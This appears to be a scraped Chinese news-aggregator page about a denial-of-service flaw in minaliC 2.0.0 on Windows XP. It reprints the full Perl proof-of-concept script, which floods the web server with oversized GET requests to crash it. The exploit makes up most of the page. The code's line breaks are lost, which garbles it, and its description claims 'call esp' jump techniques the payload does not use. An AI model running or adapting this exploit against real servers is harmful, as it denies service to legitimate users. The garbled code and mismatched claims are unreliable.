index_new5.html
../../../zaker_core/zaker_tpl_static/wap/tpl_guoji1.html
![]()
minaliC 2.0.0存在拒绝服务(DoS)漏洞,该漏洞影响Windows XP Professional Service Pack 2和3,攻击者可利用此漏洞使服务器崩溃,导致服务中断。
🎯minaliC 2.0.0的DoS漏洞可针对Windows XP Professional Service Pack 2和3(英文系统)。攻击者尝试多种策略以提高攻击的可靠性和性能,如跳转至静态'call esp',向后跳转到距栈指针已知距离的代码等。
🚫服务器未正确处理通过GET方法向Web服务器发送的大量数据请求。当服务器接收到并处理攻击者发送的包含大量数据的请求时,会立即崩溃,造成拒绝服务的情况。
💥此漏洞的利用过程中,攻击者编写的代码会生成大量垃圾数据。通过创建套接字并连接到目标服务器,发送包含大量数据的请求,从而实现对服务器的攻击,导致服务中断,影响合法用户的使用。
!/usr/bin/perluse Socket;# Exploit Title: minaliC 2.0.0 - Denial of Service (DoS)# Discovery by: Fernando Mengali# Discovery Date: 03 january 2024# Vendor Homepage: http://minalic.sourceforge.net/# Notification vendor: No reported# Tested Version: minaliC 2.0.0# Tested on: Window XP Professional - Service Pack 2 and 3 - English# Vulnerability Type: Denial of Service (DoS)# Vídeo: https://www.youtube.com/watch?v=R_gkEjvpJNw#1. Description#This technique works fine against Windows XP Professional Service Pack 2 and 3 (English).#For this exploit I have tried several strategies to increase reliability and performance:#Jump to a static 'call esp'#Backwards jump to code a known distance from the stack pointer.#The server did not properly handle request with large amounts of data via method GET to web server.#The following request sends a large amount of data to the web server to process across method GET, the server will crash as soon as it is received and processed, causing denial of service conditions.#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.#2. Proof of Concept - PoC$sis="$^O";if ($sis eq "windows"){$cmd="cls";} else {$cmd="clear";}system("$cmd");intro();main();print "[+] Exploiting... \n";my $junk = "\x41" x 245;my $host = "\x41" x 135;my $i=0;while ($i <= 3) {my $buf = "GET /" . $junk . " HTTP/1.1\r\n" . "Host: " . $host . "\r\n\r\n";my $sock;socket($sock, AF_INET, SOCK_STREAM, 0) or die "[-] Could not create socket: $!\n";my $addr = sockaddr_in($port, inet_aton($ip));connect($sock, $addr);send($sock, $buf, length($buf), 0);$i++;}print "[+] Done - Exploited success!!!!!\n\n";sub intro {print "\n";print " minaliC 2.0.0 - Denied of Service \n";print " \n";print " Coded by Fernando Mengali \n";print " \n";print " e-mail: fernando.mengalli\@gmail.com \n";print " \n";print "\n";}sub main {our ($ip, $port) = @ARGV;unless (defined($ip) && defined($port)) {print " \nUsage: $0 <ip> <port> \n";exit(-1);}}
